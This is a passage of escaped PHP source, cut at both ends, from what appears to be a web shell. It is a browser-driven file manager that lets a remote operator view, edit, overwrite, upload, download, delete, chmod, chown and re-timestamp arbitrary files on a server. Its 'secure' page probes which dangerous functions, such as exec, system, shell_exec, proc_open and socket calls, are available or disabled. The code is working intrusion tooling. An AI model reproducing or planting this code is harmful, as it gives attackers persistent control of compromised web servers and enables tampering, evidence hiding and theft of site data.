\".basename(\$filedir).\" ] ?');\\\" title='Delete File'>✘</a> <a class='action' href='?a=d&r=\".urle(\$filedir).\"' title='Download File'>➥</a></td></tr>\";\t\t\r\n\t\t\t\t\t\$count_files++;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tsort(\$reads);\r\n\t\t\$filesdirs=\"\";\r\n\t\tforeach(\$reads as \$read)\r\n\t\t{\r\n\t\t\t\$filesdirs.=\$read;\r\n\t\t}\r\n\t\tprintf(\"<div id='action'>\r\n\t\t\t\t\t<table><tr>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?d=%s'>\r\n\t\t\t\t\t\t<input name='what' type='text' /><input type='submit' name='file' value='New File'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?d=%s'>\r\n\t\t\t\t\t\t<input name='what' type='text' /><input type='submit' name='directory' value='New Dir'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?x=find'>\r\n\t\t\t\t\t\t<input type='text' name='find-value' id='find-action'/><input type='submit' name='find-button' value='Find'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t<td><form class='new' method=POST action='?d=%s&x=upload' enctype='multipart/form-data'>\r\n\t\t\t\t\t\t<input name='what' type='file' class='inputfile'/><input type='submit' name='upload' value='Upload'/>\r\n\t\t\t\t\t</form></td>\r\n\t\t\t\t\t</tr></table>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div id='home'>\r\n\t\t\t\t\t<form name='files' method=POST action='?x=action' onclick='checkCount(\\\"count\\\")'>\r\n\t\t\t\t\t\t<table class='table sortable'>\r\n\t\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t<th class='sorttable_nosort'><input type='checkbox' name='check-all' onclick='checkAll()'/></th>\r\n\t\t\t\t\t\t\t\t\t<th class='sorttable_numeric'>Name</th>\r\n\t\t\t\t\t\t\t\t\t<th>Type</th>\r\n\t\t\t\t\t\t\t\t\t<th>Size</th>\r\n\t\t\t\t\t\t\t\t\t<th>Perms</th>\r\n\t\t\t\t\t\t\t\t\t<th>Owner:Group</th>\r\n\t\t\t\t\t\t\t\t\t<th>Modified</th>\r\n\t\t\t\t\t\t\t\t\t<th>Act.</th>\r\n\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t\t<tFoot>\r\n\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t<td colspan='8'>[<span id='count'>0</span>] Selected | Dir's: [%s] File's: [%s]</td>\r\n\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t</tFoot>\r\n\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t<select name='action-value'>\r\n\t\t\t\t\t\t\t<option value='copy'>Copy</option>\r\n\t\t\t\t\t\t\t<option value='move'>Move</option>\r\n\t\t\t\t\t\t\t<option value='delete'>Delete</option>\r\n\t\t\t\t\t\t\t<option value='zip'>Archive (zip)</option>\r\n\t\t\t\t\t\t\t<option value='unzip'>Extract to (zip)</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t\t<input type='submit' value='Action' name='action-button' />\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\",\r\n\t\t\t\turle(\$dir),\r\n\t\t\t\turle(\$dir),\r\n\t\t\t\turle(\$dir),\r\n\t\t\t\t\$filesdirs,\r\n\t\t\t\t\$count_dirs,\r\n\t\t\t\t\$count_files\r\n\t\t);\r\n\t\tclosedir(\$handle);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"<center style='margin-bottom:10px'><b class='off'>Can't Open Location</b></center>\";\r\n\t}\r\n}\r\n\r\nif(any(\"r\",\$_REQUEST))\r\n{\r\n\tif(file_exists(urld(\$_REQUEST[\"r\"])))\r\n\t{\r\n\t\t\$file=strval(urld(\$_REQUEST[\"r\"]));\r\n\t\t\$status=any(\"status\",\$_SESSION)?\$_SESSION['status']:\"\";\r\n\t\t\$back=php_self.\"?d=\".urle(\$dir);\r\n\r\n\t\tprintf(\"<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t<tr><td>Name</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Size</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Permission</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Create time</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Last modified</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Last accessed</td><td>%s</td></tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t<tr><td>MIME</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>Owner/Group</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>MD5</td><td>%s</td></tr>\r\n\t\t\t\t\t\t<tr><td>SHA1</td><td>%s</td></tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\",\r\n\t\t\tbasename(\$file),\r\n\t\t\tGetFileSize(@filesize(\$file)),\r\n\t\t\tGetFilePerm(\$file),\r\n\t\t\tGetFileTime(\$file,\"create\"),\r\n\t\t\tGetFileTime(\$file,\"modify\"),\r\n\t\t\tGetFileTime(\$file,\"access\"),\r\n\t\t\tmime_content_type(\$file),\r\n\t\t\tGetFileOwnerGroup(\$file),\r\n\t\t\t@md5_file(\$file),\r\n\t\t\t@sha1_file(\$file)\r\n\t\t);\r\n\r\n\t\tif(is_file(\$file)||is_link(\$file))\r\n\t\t{\r\n\t\t\t\$menu=array(\r\n\r\n\t\t\t\t\"Back\" => \"?a=b&r=\",\r\n\t\t\t\t\"Edit\" => \"?a=e&r=\",\r\n\t\t\t\t\"View\" => \"?a=v&r=\",\r\n\t\t\t\t\"Copy\" => \"?a=cp&r=\",\r\n\t\t\t\t\"Move\" => \"?a=mv&r=\",\r\n\t\t\t\t\"Download\" => \"?a=d&r=\",\r\n\t\t\t\t\"Hexdump\" => \"?a=h&r=\",\r\n\t\t\t\t\"Chmod\" => \"?a=c&r=\",\r\n\t\t\t\t\"Chown\" => \"?a=cwn&r=\",\r\n\t\t\t\t\"Chgrp\" => \"?a=cgp&r=\",\r\n\t\t\t\t\"Touch\" => \"?a=t&r=\",\r\n\t\t\t\t\"Rename\" => \"?a=r&r=\",\r\n\t\t\t\t\"Delete\" => \"?a=x&r=\"\r\n\t\t\t);\r\n\t\t}\r\n\t\telseif(is_dir(\$file))\r\n\t\t{\r\n\t\t\t\$menu=array(\r\n\r\n\t\t\t\t\"Back\" => \"?a=b&r=\",\r\n\t\t\t\t\"Chmod\" => \"?a=c&r=\",\r\n\t\t\t\t\"Chown\" => \"?a=cwn&r=\",\r\n\t\t\t\t\"Chgrp\" => \"?a=cgp&r=\",\r\n\t\t\t\t\"Touch\" => \"?a=t&r=\",\r\n\t\t\t\t\"Rename\" => \"?a=r&r=\",\r\n\t\t\t\t\"Delete\" => \"?a=x&r=\"\r\n\t\t\t);\r\n\t\t}\r\n\r\n\t\t\$nu=\"\";\r\n\t\t\r\n\t\tforeach(\$menu as \$key => \$val)\r\n\t\t{\r\n\t\t\t\$idxkey=substr(\$val,1,1);\r\n\t\t\t\$idxval=substr(\$val,3,strpos(\$val,'&')-3);\r\n\t\t\t\$active=any(\$idxkey,\$_REQUEST)&&\$_REQUEST[\$idxkey]==\$idxval?\"class='active'\":\"\";\r\n\t\t\tif(\$key==\"Delete\")\r\n\t\t\t{\r\n\t\t\t\t\$nu.=\"<li><a \".\$active.\" href='\".\$val.urle(\$file).\"' onclick=\\\"return confirm('Delete Filename [ \".basename(\$file).\" ] ?');\\\">\".\$key.\"</a></li>\";\r\n\t\t\t}\r\n\t\t\telseif(\$key==\"Back\")\r\n\t\t\t{\r\n\t\t\t\t\$nu.=\"<li><a \".\$active.\" href='\".\$back.\"'>\".\$key.\"</a></li>\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$nu.=\"<li><a \".\$active.\" href='\".\$val.urle(\$file).\"'>\".\$key.\"</a></li>\";\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprintf(\"<div class='menu'>\r\n\t\t\t<ul>%s</ul>\r\n\t\t</div>\",\$nu);\r\n\r\n\t\tif(\$_REQUEST['a']=='e')\r\n\t\t{\r\n\t\t\t\$source=\"\";\r\n\r\n\t\t\tif(filesize(\$file) > 5242880)\r\n\t\t\t{\r\n\t\t\t\t\$source.=\"Lazy to Read more than 5MB Files\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$open=fopen(\$file,'r');\r\n\r\n\t\t\t\tif(\$open) \r\n\t\t\t\t{\r\n\t\t\t\t\twhile(!feof(\$open)) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$source.=htmlentities(fread(\$open,(1024*4)));\r\n\t\t\t\t\t}\r\n\t\t\t\t\tfclose(\$open);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tprintf(\"<form class='frmsource' method='post'>\r\n\t\t\t\t\t<textarea id='sourcefocus' name='sourcecode' rows='25' cols='100'>%s</textarea>\r\n\t\t\t\t\t<input type='Submit' value='Save file' name='save'/>\r\n\t\t\t\t\t<label>%s</label>\r\n\t\t\t\t</form>\",\$source,\$status);\r\n\t\t\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"save\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$new_source=\$_REQUEST['sourcecode'];\r\n\t\t\t\tif(function_exists(\"chmod\")) chmod(\$file,0755);\r\n\t\t\t\t\$source_edit=fopen(\$file,'w+');\r\n\t\t\t\t\$tulis=fwrite(\$source_edit,\$new_source);\r\n\t\t\t\tfclose(\$source_edit);\r\n\t\t\t\tif(\$tulis)\r\n\t\t\t\t{\r\n\t\t\t\t\t\$_SESSION['status']=\"File Saved ! \".GetFileTime(\$file,\"modify\").\" | \".GetFileSize(filesize(\$file));\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t\$_SESSION['status']=\"Whoops, something went wrong...\";\r\n\t\t\t\t}\r\n\t\t\t\theader(\"location:\".php_self.\"?a=e&r=\".urle(\$file));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='r')\r\n\t\t{\r\n\t\t\tprintf(\"<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='name' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Rename' name='rename'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>\",basename(\$file),\$status);\r\n\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"rename\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$path=pathinfo(trim(\$file));\r\n\t\t\t\t\$newname=\$path['dirname']._.trim(\$_REQUEST['name']);\r\n\t\t\t\tif(!rename(trim(\$file),\$newname)) \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Whoops, something went wrong...';\r\n\t\t\t\t}\r\n\t\t\t\telse \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Renamed file with success';\r\n\t\t\t\t}\r\n\t\t\t\theader(\"location:\".php_self.\"?a=r&r=\".urle(\$newname));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='c')\r\n\t\t{\r\n\t\t\tprintf(\"<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='octal' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Chmod' name='chmod'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>\",substr(decoct(fileperms(\$file)),2),\$status);\r\n\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"chmod\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$octal=octdec(\$_REQUEST['octal']);\r\n\t\t\t\tif(!chmod(trim(\$file),\$octal)) \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Whoops, something went wrong...';\r\n\t\t\t\t}\r\n\t\t\t\telse \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Chmod file with success';\r\n\t\t\t\t}\r\n\t\t\t\theader(\"location:\".php_self.\"?a=c&r=\".urle(\$file));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='cwn')\r\n\t\t{\r\n\t\t\t\$own='';\r\n\t\t\tif(function_exists('posix_getpwuid')) \r\n\t\t\t{\r\n\t\t\t\t\$user=posix_getpwuid(fileowner(\$x));\r\n\t\t\t\t\$own=\$user['name'];\r\n\t\t\t}\r\n\r\n\t\t\tprintf(\"<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='own' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Chown' name='chown'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>\",\$own,\$status);\r\n\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"chown\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$own=\$_REQUEST['own'];\r\n\t\t\t\tif(!chown(trim(\$file),\$own)) \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Whoops, something went wrong...';\r\n\t\t\t\t}\r\n\t\t\t\telse \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Chown file with success';\r\n\t\t\t\t}\r\n\t\t\t\theader(\"location:\".php_self.\"?a=cwn&r=\".urle(\$file));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='cgp')\r\n\t\t{\r\n\t\t\t\$grp='';\r\n\t\t\tif(function_exists('posix_getgrgid')) \r\n\t\t\t{\r\n\t\t\t\t\$group=posix_getgrgid(filegroup(\$x));\r\n\t\t\t\t\$grp=\$group['name'];\r\n\t\t\t}\r\n\r\n\t\t\tprintf(\"<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='grp' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Chgrp' name='chgrp'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>\",\$grp,\$status);\r\n\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"chgrp\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$grp=\$_REQUEST['grp'];\r\n\t\t\t\tif(!chgrp(trim(\$file),\$grp)) \r\n\t\t\t\t{\r\n\t\t\t\t\t\$_SESSION['status']='Whoops, something went wrong...';\r\n\t\t\t\t}\r\n\t\t\t\telse \r\n\t\t\t\t{\r\n\t\t\t\t\t\$_SESSION['status']='Chgrp file with success';\r\n\t\t\t\t}\r\n\t\t\t\theader(\"location:\".php_self.\"?a=cgp&r=\".urle(\$file));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='t')\r\n\t\t{\r\n\t\t\tprintf(\"<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='time' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='Touch' name='touch'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>\",GetFileTime(\$file,\"modify\"),\$status);\r\n\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"touch\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$time=\$_REQUEST['time'];\r\n\t\t\t\tif(!touch(trim(\$file),strtotime(\$time))) \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Whoops, something went wrong...';\r\n\t\t\t\t}\r\n\t\t\t\telse \r\n\t\t\t\t{\r\n\t\t\t\t \$_SESSION['status']='Touched file with success';\r\n\t\t\t\t}\r\n\t\t\t\theader(\"location:\".php_self.\"?a=t&r=\".urle(\$file));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='v')\r\n\t\t{\r\n\t\t\tprintf(\"<div class='menu'>\r\n\t\t\t\t\t<ul>\r\n\t\t\t\t\t\t<li><a href='?a=v&r=%s'>Source</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=f&r=%s'>iFrame</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=i&r=%s'>Image</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=v&r=%s'>Video</a></li>\r\n\t\t\t\t\t\t<li><a href='?a=v&w=a&r=%s'>Audio</a></li>\r\n\t\t\t\t\t</ul>\r\n\t\t\t\t</div>\",\r\n\t\t\turle(\$file),urle(\$file),\r\n\t\t\turle(\$file),urle(\$file),\r\n\t\t\turle(\$file));\r\n\r\n\t\t\tif(is_readable(\$file))\r\n\t\t\t{\r\n\t\t\t\tif(any(\"w\",\$_REQUEST))\r\n\t\t\t\t{\r\n\t\t\t\t\t\$url=GetUrlFromPath(\$file);\r\n\t\t\t\t\t\$type=pathinfo(\$url)['extension'];\r\n\r\n\t\t\t\t\tif(\$_REQUEST['w']=='f')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"<center><iframe src='%s' width='100%%' height='325' frameBorder='0'>Suck</iframe><a href='%s' target='_blank'>--> New Tab <--</a></center>\",\$url,\$url);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tif(\$_REQUEST['w']=='i')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"<center><img src='%s' alt=' Not Image'/></center>\",\$url);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tif(\$_REQUEST['w']=='v')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"<center><video width='640' height='320' controls><source src='%s' type='video/%s'>Suck</video></center>\",\$url,\$type);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tif(\$_REQUEST['w']=='a')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"<center><audio controls><source src='%s' type='audio/%s'>Suck</audio></center>\",\$url,\$type);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tif(filesize(\$file) > 5242880)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"Lazy to Read more than 5MB Files\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$code=highlight_file(\$file,true);\r\n\t\t\t\t\t\tprintf(\"<div class='highlight'>%s</div>\",\$code);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\tif(\$_REQUEST['a']=='h')\r\n\t\t{\r\n\t\t\t\$c=file_get_contents(\$file);\r\n\t\t\t\$n=0;\r\n\t\t\t\$h=array('00000000<br>','','');\r\n\t\t\t\$len=strlen(\$c);\r\n\t\t\tfor(\$i=0;\$i<\$len;++\$i)\r\n\t\t\t{\r\n\t\t\t\t\$h[1].=sprintf('%02X',ord(\$c[\$i])).' ';\r\n\t\t\t\tswitch(ord(\$c[\$i]))\r\n\t\t\t\t{\r\n\t\t\t\t\tcase 0: \$h[2].=' ';break;\r\n\t\t\t\t\tcase 9: \$h[2].=' ';break;\r\n\t\t\t\t\tcase 10:\$h[2].=' ';break;\r\n\t\t\t\t\tcase 13:\$h[2].=' ';break;\r\n\t\t\t\t\tdefault:\$h[2].=\$c[\$i];break;\r\n\t\t\t\t}\r\n\t\t\t\t\$n++;\r\n\t\t\t\tif(\$n==32)\r\n\t\t\t\t{\r\n\t\t\t\t\t\$n=0;\r\n\t\t\t\t\tif(\$i+1 < \$len)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$h[0].=sprintf('%08X',\$i+1).'<br>';\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\$h[1].='<br>';\r\n\t\t\t\t\t\$h[2].=\"\\n\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tprintf(\"\r\n\t\t\t\t<div id='hexdump'>\r\n\t\t\t\t\t<table class='hexdump'>\r\n\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<td><pre>%s</pre></td>\r\n\t\t\t\t\t\t\t<td><pre>%s</pre></td>\r\n\t\t\t\t\t\t\t<td><pre>%s</pre></td>\r\n\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\",\$h[0],\$h[1],htmlspecialchars(\$h[2]));\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='cp'||\$_REQUEST['a']=='mv')\r\n\t\t{\r\n\t\t\tprintf(\"<form class='new' method='post'>\r\n\t\t\t\t<input type='text' name='file-dest' value='%s'/>\r\n\t\t\t\t<input type='Submit' value='%s' name='submit'/>\r\n\t\t\t\t<label>%s</label>\r\n\t\t\t</form>\",\$file,(\$_REQUEST['a']=='cp'?'Copy':'Move'),\$status);\r\n\r\n\t\t\tif(any(\"status\",\$_SESSION)) unset(\$_SESSION['status']);\r\n\r\n\t\t\tif(any(\"submit\",\$_REQUEST))\r\n\t\t\t{\r\n\t\t\t\t\$source=\$file;\r\n\t\t\t\t\$dest=\$_REQUEST['file-dest'];\r\n\r\n\t\t\t\tif(!file_exists(\$dest))\r\n\t\t\t\t{\r\n\t\t\t\t\tif (\$_REQUEST['a']=='cp')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(!copy(trim(\$source),trim(\$dest))) \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t \$_SESSION['status']='Whoops, cannot copying...';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t \$_SESSION['status']=\"Copy file with success <a href=?a=v&r='\" . urle(\$dest) . \"'>'\" . basename(\$dest) . \"'</a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\telseif(\$_REQUEST['a']=='mv')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(!copy(trim(\$source),trim(\$dest))) \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t \$_SESSION['status']='Whoops, cannot moving...';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t if(Remove(\$source))\r\n\t\t\t\t\t\t {\r\n\t\t\t\t\t\t \t\$_SESSION['status']=\"Move file with success\";\r\n\t\t\t\t\t\t \t\$file=\$dest;\r\n\t\t\t\t\t\t }\r\n\t\t\t\t\t\t else\r\n\t\t\t\t\t\t {\r\n\t\t\t\t\t\t \t\$_SESSION['status']='Whoops, just copying...';\r\n\t\t\t\t\t\t }\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t\$_SESSION['status']=\"Whoops, File was Exists <a href=?a=v&r='\" . urle(\$dest) . \"'>'\" . basename(\$dest) . \"'</a>\";\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif(\$_REQUEST['a']=='cp')\r\n\t\t\t\t{\r\n\t\t\t\t\theader(\"location:\".php_self.\"?a=cp&r=\".urle(\$file));\r\n\t\t\t\t}\r\n\t\t\t\telseif(\$_REQUEST['a']=='mv')\r\n\t\t\t\t{\r\n\t\t\t\t\theader(\"location:\".php_self.\"?a=mv&r=\".urle(\$file));\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(\$_REQUEST['a']=='d')\r\n\t\t{\r\n\t\t\tif(file_exists(\$file))\r\n\t\t\t{\r\n\t\t\t\theader('Cache-Control:must-revalidate,post-check=0,pre-check=0');\r\n\t\t\t\theader('Content-Disposition:attachment;filename='.basename(\$file));\r\n\t\t\t\theader('Content-Type:application/octet-stream');\r\n\t\t\t\theader('Content-Description:File Transfer');\r\n\t\t\t\theader('Content-Transfer-Encoding:binary');\r\n\t\t\t\theader('Content-Length:'.filesize(\$file));\r\n\t\t\t\theader('Pragma:public');\r\n\t\t\t\theader('Expires:0');\r\n\t\t\t\tob_clean();\r\n\t\t\t\treadfile(\$file);\r\n\t\t\t\texit;\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\tif(\$_REQUEST['a']=='x')\r\n\t\t{\r\n\t\t\tif(file_exists(\$file))\r\n\t\t\t{\r\n\t\t\t\tif(Remove(\$file))\r\n\t\t\t\t{\r\n\t\t\t\t\theader(\"location:\".\$back);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tprint '<font class=\"off\">Cannot Delete</font>';\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint '<font class=\"off\">File Not Found</font>';\r\n\t}\r\n}\r\n\r\nif(any(\"x\",\$_REQUEST))\r\n{\r\n\tif(\$_REQUEST['x']==\"logout\")\r\n\t{\r\n\t\tsession_destroy();\r\n\t\tsession_regenerate_id();\r\n\t\theader('location:'.php_self);\r\n\t}\r\n\tif(\$_REQUEST['x']==\"secure\")\r\n\t{\r\n\t\t\$disable_functions=array_filter(array_map('trim',explode(',',ini_get(\"disable_functions\"))));\r\n\r\n\t\t\$security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv',\r\n\t\t'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open',\r\n\t\t'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg',\r\n\t\t'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput',\r\n\t\t'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open',\r\n\t\t'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid',\r\n\t\t'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all',\r\n\t\t'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file',\r\n\t\t'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork',\r\n\t\t'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask',\r\n\t\t'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited',\r\n\t\t'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo',\r\n\t\t'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid',\r\n\t\t'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close',\r\n\t\t'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir',\r\n\t\t'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind',\r\n\t\t'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair',\r\n\t\t'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read',\r\n\t\t'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock',\r\n\t\t'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server',\r\n\t\t'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode');\r\n\r\n\t\tsort(\$security); \r\n\t\t\$fucks=array_unique(array_merge(\$disable_functions,\$security));\r\n\t\t\$table=\"\";\r\n\t\t\$enable=0;\r\n\t\t\$disable=0;\r\n\t\t\$die=array();\r\n\t\t\$ready=array();\r\n\t\t\$off=array();\r\n\t\t\$total=count(\$fucks);\r\n\r\n\t\tforeach(\$fucks as \$fuck)\r\n\t\t{\r\n\t\t\t\$table.=\"<tr><td></td><td>\$fuck</td><td>\";\r\n\t\t\tif(in_array(\$fuck,\$disable_functions))\r\n\t\t\t{\r\n\t\t\t\t\$table.=\"<center><font color=red>DIE</font></center>\";\r\n\t\t\t\t\$die[]=\$fuck;\r\n\t\t\t\t\$disable++;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tif(function_exists(\$fuck)||is_callable(\$fuck))\r\n\t\t\t\t{\r\n\t\t\t\t\t\$table.=\"<center><font color=green>READY</font></center>\";\r\n\t\t\t\t\t\$ready[]=\$fuck;\r\n\t\t\t\t\t\$enable++;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t\$table.=\"<center><font 